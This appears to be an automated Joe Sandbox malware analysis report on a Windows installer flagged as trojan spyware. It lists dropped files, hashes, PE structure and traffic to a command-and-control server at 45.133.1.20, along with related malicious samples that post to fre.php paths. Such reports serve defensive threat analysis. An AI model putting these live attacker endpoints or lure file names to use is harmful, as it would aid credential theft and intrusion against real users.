Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	ypdTgfE0o8.exe	false		high
http://www.ibsensoftware.com/	cbgsujmwws.exe, cbgsujmwws.exe, 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cbgsujmwws.exe, 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.133.1.20	unknown	Netherlands		35913	DEDIPATH-LLCUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	620790
Start date and time: 05/05/202208:44:39	2022-05-05 08:44:39 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ypdTgfE0o8 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/6@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 94.8% (good quality ratio 91.4%) Quality average: 79.3% Quality standard deviation: 27.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 74 Number of non-executed functions: 33
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:46:04	API Interceptor	51x Sleep call for process: cbgsujmwws.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.133.1.20	MOTEX AW22.xlsx	Get hash	malicious	Browse	45.133.1.20/oluwa/five/fre.php
	XGHLlFY84K.exe	Get hash	malicious	Browse	45.133.1.20/oluwa/five/fre.php
	bank slip.xlsx	Get hash	malicious	Browse	45.133.1.20/oluwa/five/fre.php
	SPECIAL ORDER GOLDEN HPS-27-04.xlsx	Get hash	malicious	Browse	45.133.1.20/oluwa/five/fre.php
	INV_TMB-CI2006-003.xlsx	Get hash	malicious	Browse	45.133.1.20/rex/five/fre.php
	7PT7wqAlIX.exe	Get hash	malicious	Browse	45.133.1.20/oluwa/five/fre.php
	oURHKlSlUR.exe	Get hash	malicious	Browse	45.133.1.20/rex/five/fre.php
	Invoice 218997.pdf.xlsx	Get hash	malicious	Browse	45.133.1.20/oluwa/five/fre.php
	JeRksCW5NG.exe	Get hash	malicious	Browse	45.133.1.20/oluwa/five/fre.php
	02_extracted.exe	Get hash	malicious	Browse	45.133.1.20/vedoone/five/fre.php
	confirmaci#U00f3n de la direcci#U00f3n de entrega.exe	Get hash	malicious	Browse	45.133.1.20/vedoone/five/fre.php
	confirmaci#U00f3n de la direcci#U00f3n de entrega..exe	Get hash	malicious	Browse	45.133.1.20/vedoone/five/fre.php
	DETALLES DEL BANCO.exe	Get hash	malicious	Browse	45.133.1.20/uche/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DEDIPATH-LLCUS	MOTEX AW22.xlsx	Get hash	malicious	Browse	45.133.1.20
	RT35126077.exe	Get hash	malicious	Browse	45.133.1.41
	CryptoMiner.exe	Get hash	malicious	Browse	45.9.20.31
	beamer.x86-20220504-2050	Get hash	malicious	Browse	45.133.1.58
	phantom.arm7-20220504-2050	Get hash	malicious	Browse	45.133.1.58
	2320Zi8N6v	Get hash	malicious	Browse	109.94.223.180
	2rtU0YeO7l	Get hash	malicious	Browse	5.253.235.14
	Barclays-#700339Customer Order #47132..exe	Get hash	malicious	Browse	45.133.1.45
	7nSmJgc4Js.exe	Get hash	malicious	Browse	45.144.225.57
	Barclays-#700339Customer Order #47132.exe	Get hash	malicious	Browse	45.133.1.45
	Barclays-#700339Customer Order #471320.exe	Get hash	malicious	Browse	45.133.1.45
	XGHLlFY84K.exe	Get hash	malicious	Browse	45.133.1.20
	bank slip.xlsx	Get hash	malicious	Browse	45.133.1.20
	#700339Customer Order #47132.exe	Get hash	malicious	Browse	45.133.1.45
	SPECIAL ORDER GOLDEN HPS-27-04.xlsx	Get hash	malicious	Browse	45.133.1.20
	INV_TMB-CI2006-003.xlsx	Get hash	malicious	Browse	45.133.1.20
	RFQ.exe	Get hash	malicious	Browse	45.128.51.66
	Swift Copy.exe	Get hash	malicious	Browse	45.133.1.45
	7PT7wqAlIX.exe	Get hash	malicious	Browse	45.133.1.20
	oURHKlSlUR.exe	Get hash	malicious	Browse	45.133.1.20

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	MOTEX AW22.xlsx	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)	MOTEX AW22.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Download File

Process:	C:\Users\user\Desktop\ypdTgfE0o8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	4.504221834875508
Encrypted:	false
SSDEEP:	96:X5xoZGYXbECrq+M4Ix+MeBZtXIpXSdOWPmoynsx:X5xogYXN24geBZVIpidPPmoyn
MD5:	F9E42C92E371CEDC22C78E2900418651
SHA1:	3E99BA4A4A007D2AD1CFA6E3FDA91B01A710839D
SHA-256:	F340BF91627787A2770C897AA9555BB82382CDCC2232904B5707238AB0A85E39
SHA-512:	7CA0A18F7AE83F0D11D8B33DDCA579FB5E5629B5255EEBF28B2E256A0B4449F4DEE5BDFF2EF6F9E1AF323A04111A688D9251629DDECB046746978F94D469DE05
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 7%
Joe Sandbox View:	Filename: MOTEX AW22.xlsx, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.1..m_B.m_B.m_B.r[B.m_B.qQB.m_B.rUB.m_BK.^C.m_B.m^B]m_B.3[C.m_B.3.B.m_B.3]C.m_BRich.m_B........PE..L.....sb..................................... ....@..........................P...............................................".......@...............................!............................................... ..`............................text...j........................... ..`.rdata....... ......................@..@.data...<....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jplmbcuny

Download File

Process:	C:\Users\user\Desktop\ypdTgfE0o8.exe
File Type:	data
Category:	dropped
Size (bytes):	4875
Entropy (8bit):	6.186807480747828
Encrypted:	false
SSDEEP:	96:mZgnifiA8jYSIHGhUgwmthwwNAPnzoUJKAf:jAiq2UJmteRJ5f
MD5:	0DBCEB0FC7BCB589C214A5CBDF34B95B
SHA1:	E7F948A31C2CE8AC25CCE1169654435CEC455BEF
SHA-256:	7A5C8835A40792321F57502A295E3972D2B1B1288AE9BD2E8899169A67941097
SHA-512:	7BE085588931F5CA5FE9622E6B758EB5DA6DBD683732814E1C570E113B0D144088DBFE52F3C5116619A4DF97B45B8D5804581BB807E0725B353520CC4B2432DA
Malicious:	false
Reputation:	low
Preview:	Jeiaa..M.M......Qap.!.pt.Ap.!.pt.I..Ya(.].aaa..Ua`.m`.q.Y.I\aaa.9.=`.m`.q.Y.IGaaa.1.5`.m`.q.Y.I2aaa.).-`.m`.q.Y.I.aaa.!.%..qe..i..!dd.m..A.E.q.Ie..I.M.I.].e".3.q.XR.Id.].e#.]....U.EQ.Iaaaa.e.f,..]`.9.`.1.`.)..`.!..`.A.`.I..W.q..mX..U..Ob.Q`.9...ipf.Qd.]Iaaaa(..e.aaa.e.n,..U...Q...#ma..M..p.!.pt.Y.i.a..m..i.a.q.u"."e.Y.].i.a..i.b.Y.]#ma.w['.I.caaI.caa#ua..`@.I.caaI.caa#ia.n...I.caaI.caa#ia..M.M.p.!.pt.I(.Yqaaa.9.]..Ya.w.]'aa.]..].Y..YLEI.faa.!..i..i..a.n9.n=.I..i."Ba.n9.n=.c.i..!a.f9...`@.I,baa.I3^``.ULp.I.`.iI.```.U..Ua.g..QaLh(.Qbaaa.Q#ea..M.M.p.!.pt.I(.Y.aaa.!.]..Ya.w.]'aa.]..].Y..YLEI.eaa.!p..aaa.i..i..a.n!.n%.m..i."Ba.n!.n%.q..i.2B.n!.n%.u..i..3d.v!.v%.I..i."Bc.n!.n%.f.i..!a.f!..w['.ICaaa.IJ]``.U..ya.i.I.y.bLx`.y`.u`.q`.m`.iI._``.U..Ua.g..QaLh(.Qbaaa.Q#ua..M.M}(.Yqaaa.E.]..Ya.w.]'aa.]..].Y..YLEI.daa.!..i..i..*a.nE.nI.m..i."Ba.nE.nI.c.i..!a.fE..n...I.aaa.I.]``.ULo`.m`.iI.^`

C:\Users\user\AppData\Local\Temp\jurqlvqzsu80j5x5

Download File

Process:	C:\Users\user\Desktop\ypdTgfE0o8.exe
File Type:	data
Category:	dropped
Size (bytes):	106495
Entropy (8bit):	7.955352895008678
Encrypted:	false
SSDEEP:	1536:DqjPKwwio2fyBOo0vlv/RR53SfpU1FzziiEoDMFZDwgPgLJ68a34ou:Dqz02fOR09XT5CIzziTogbjkJ68aS
MD5:	D36BFA103F3793806490CC1E20CEB429
SHA1:	9FFC447F3FAF0BD6047AF095650237C6BE04CC5E
SHA-256:	098B0F7A8E149F3F30525C7D956324BDEF23F43648AD136ED21B393F21E64F99
SHA-512:	7662F73F06600360F83AF60BDF9B8BE37E8ECA9702B804161DF59697F26C3F14679DCE7C9C0F24A49AADCED618A1885B690DF8477768068B5F4F2182FDE4C7CB
Malicious:	false
Reputation:	low
Preview:	B...B.B.x.H..\|I...$...].r..j..pD.!Eub.u.T..qx?..6L...;Kp..ls"....>2i.......O...!.g....Y.M.-.>[Z....F..i....\|....d0.@.......]..=.....`.......2t...........!1....AB..Nw.....L....r.<._$.!JJ..1..@...........`.C...Z...._...N!.ye.]{.HH.I..Ox...GO.I..P...Yj.._.\|,.F.$.......Z..p7..!E.b...T..qf?.6L...;Up..ls...W..}..<..S.MSZ...@...F.T......."..A.#..0N.V.G..x...w.@......Jg..i.....^..+7>.E}...v..l.....N$..D./.#...di...s$......-Zk.P...}g..N.D...U..6.~..0.......j..../......ye..%)H6....@...GO.I...B...x...a.=n..k..^.r.."..p.D.!..b.u.T..qx?...L....X.p.lsw.VW.G,..x....%GZ.'.@...F.._D...."..A.#D.0N.....xp.w.@......Jg..i.....^..+7>.E}...v..l.....N$..D./.#...di...s$......-Zk.P...}g..N....U..6.~..0.......j..../...N!.ye....H6`....>...GO.I...B...x...\|,...$...C.r..j..p*D.!Eub.u.T..qx?..6L...;Kp..ls...W.}..<...MGZ.'.@...F...D...."..A.#..0N.V..c.xp..w.@......Jg..i.....^..+7>.E}...v..l.....N$..D./.#...di...s$......-Zk.P...}g..N....U..6.~..0.......j..../.

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	4.504221834875508
Encrypted:	false
SSDEEP:	96:X5xoZGYXbECrq+M4Ix+MeBZtXIpXSdOWPmoynsx:X5xogYXN24geBZVIpidPPmoyn
MD5:	F9E42C92E371CEDC22C78E2900418651
SHA1:	3E99BA4A4A007D2AD1CFA6E3FDA91B01A710839D
SHA-256:	F340BF91627787A2770C897AA9555BB82382CDCC2232904B5707238AB0A85E39
SHA-512:	7CA0A18F7AE83F0D11D8B33DDCA579FB5E5629B5255EEBF28B2E256A0B4449F4DEE5BDFF2EF6F9E1AF323A04111A688D9251629DDECB046746978F94D469DE05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 7%
Joe Sandbox View:	Filename: MOTEX AW22.xlsx, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.1..m_B.m_B.m_B.r[B.m_B.qQB.m_B.rUB.m_BK.^C.m_B.m^B]m_B.3[C.m_B.3.B.m_B.3]C.m_BRich.m_B........PE..L.....sb..................................... ....@..........................P...............................................".......@...............................!............................................... ..`............................text...j........................... ..`.rdata....... ......................@..@.data...<....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe
File Type:	data
Category:	dropped
Size (bytes):	49
Entropy (8bit):	1.2701062923235522
Encrypted:	false
SSDEEP:	3:/l1PL3n:fPL3
MD5:	CD8FA61AD2906643348EEF98A988B873
SHA1:	0B10E2F323B5C73F3A6EA348633B62AE522DDF39
SHA-256:	49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
SHA-512:	1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
Malicious:	false
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.738733424317965
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ypdTgfE0o8.exe
File size:	126706
MD5:	d2ce3b2a5f3efb1fcede96304e57a531
SHA1:	d74be8fe0be4ec13340dad9c0fdeb653c9c8b90e
SHA256:	e0a4948a58829f4ecd9e6fb9b28e127a6827bd8761ded085d2069a248f6f5462
SHA512:	fd0d0b51000b146049db24ecac27885ff4f688b4e40b42061972d21aaa45f8657437db8f56880f5414f00b5e35febce8a339b1d30bd387f8f11a179b222e828b
SSDEEP:	3072:l1NjcVVnLpPunbrclqvVjW/GAk+dOH6yzqwr1O+5ZFy:HNeZmrc+/AkDBzqwwqi
TLSH:	83C3F1157AE0C467C8631A712E3A5BA75FF2D5331234538F5320AF9C7E36A91990E743
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x4034f7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FC9BC3D692Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FC9BC3D68FAh
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A2D8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b000	0xa50	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6515	0x6600	False	0.661534926471	data	6.43970794855	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.45	data	5.14577456407	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	False	0.499348958333	data	4.01369865045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2b000	0x10000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3b000	0xa50	0xc00	False	0.402018229167	data	4.18462166815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3b190	0x2e8	data	English	United States
RT_DIALOG	0x3b478	0x100	data	English	United States
RT_DIALOG	0x3b578	0x11c	data	English	United States
RT_DIALOG	0x3b698	0x60	data	English	United States
RT_GROUP_ICON	0x3b6f8	0x14	data	English	United States
RT_MANIFEST	0x3b710	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 5, 2022 08:46:01.466833115 CEST	49771	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:01.492583990 CEST	80	49771	45.133.1.20	192.168.2.6
May 5, 2022 08:46:01.492726088 CEST	49771	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:01.499744892 CEST	49771	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:01.525523901 CEST	80	49771	45.133.1.20	192.168.2.6
May 5, 2022 08:46:01.525635004 CEST	49771	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:01.551342964 CEST	80	49771	45.133.1.20	192.168.2.6
May 5, 2022 08:46:01.580796957 CEST	80	49771	45.133.1.20	192.168.2.6
May 5, 2022 08:46:01.580830097 CEST	80	49771	45.133.1.20	192.168.2.6
May 5, 2022 08:46:01.580961943 CEST	49771	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:01.581115007 CEST	49771	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:01.607146978 CEST	80	49771	45.133.1.20	192.168.2.6
May 5, 2022 08:46:03.092267990 CEST	49772	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:03.118486881 CEST	80	49772	45.133.1.20	192.168.2.6
May 5, 2022 08:46:03.118626118 CEST	49772	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:03.132381916 CEST	49772	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:03.158200026 CEST	80	49772	45.133.1.20	192.168.2.6
May 5, 2022 08:46:03.158319950 CEST	49772	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:03.184111118 CEST	80	49772	45.133.1.20	192.168.2.6
May 5, 2022 08:46:03.221048117 CEST	80	49772	45.133.1.20	192.168.2.6
May 5, 2022 08:46:03.221069098 CEST	80	49772	45.133.1.20	192.168.2.6
May 5, 2022 08:46:03.221163034 CEST	49772	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:03.221235037 CEST	49772	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:03.246866941 CEST	80	49772	45.133.1.20	192.168.2.6
May 5, 2022 08:46:04.167363882 CEST	49773	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:04.193100929 CEST	80	49773	45.133.1.20	192.168.2.6
May 5, 2022 08:46:04.193236113 CEST	49773	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:04.197166920 CEST	49773	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:04.222893000 CEST	80	49773	45.133.1.20	192.168.2.6
May 5, 2022 08:46:04.222978115 CEST	49773	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:04.248573065 CEST	80	49773	45.133.1.20	192.168.2.6
May 5, 2022 08:46:04.298516035 CEST	80	49773	45.133.1.20	192.168.2.6
May 5, 2022 08:46:04.298542023 CEST	80	49773	45.133.1.20	192.168.2.6
May 5, 2022 08:46:04.298629045 CEST	49773	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:04.298717022 CEST	49773	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:04.324295998 CEST	80	49773	45.133.1.20	192.168.2.6
May 5, 2022 08:46:07.444600105 CEST	49774	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:07.471069098 CEST	80	49774	45.133.1.20	192.168.2.6
May 5, 2022 08:46:07.471250057 CEST	49774	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:07.670756102 CEST	49774	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:07.696760893 CEST	80	49774	45.133.1.20	192.168.2.6
May 5, 2022 08:46:07.696929932 CEST	49774	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:07.725140095 CEST	80	49774	45.133.1.20	192.168.2.6
May 5, 2022 08:46:07.746820927 CEST	80	49774	45.133.1.20	192.168.2.6
May 5, 2022 08:46:07.746857882 CEST	80	49774	45.133.1.20	192.168.2.6
May 5, 2022 08:46:07.746978998 CEST	49774	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:07.778664112 CEST	49774	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:07.805520058 CEST	80	49774	45.133.1.20	192.168.2.6
May 5, 2022 08:46:10.427409887 CEST	49776	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:10.453461885 CEST	80	49776	45.133.1.20	192.168.2.6
May 5, 2022 08:46:10.453638077 CEST	49776	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:10.458256960 CEST	49776	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:10.484729052 CEST	80	49776	45.133.1.20	192.168.2.6
May 5, 2022 08:46:10.484827995 CEST	49776	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:10.510766029 CEST	80	49776	45.133.1.20	192.168.2.6
May 5, 2022 08:46:10.540349960 CEST	80	49776	45.133.1.20	192.168.2.6
May 5, 2022 08:46:10.540378094 CEST	80	49776	45.133.1.20	192.168.2.6
May 5, 2022 08:46:10.540584087 CEST	49776	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:10.548280001 CEST	49776	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:10.574561119 CEST	80	49776	45.133.1.20	192.168.2.6
May 5, 2022 08:46:11.757216930 CEST	49777	80	192.168.2.6	45.133.1.20
May 5, 2022 08:46:11.783070087 CEST	80	49777	45.133.1.20	192.168.2.6
May 5, 2022 08:46:11.783195972 CEST	49777	80	192.168.2.6	45.133.1.20
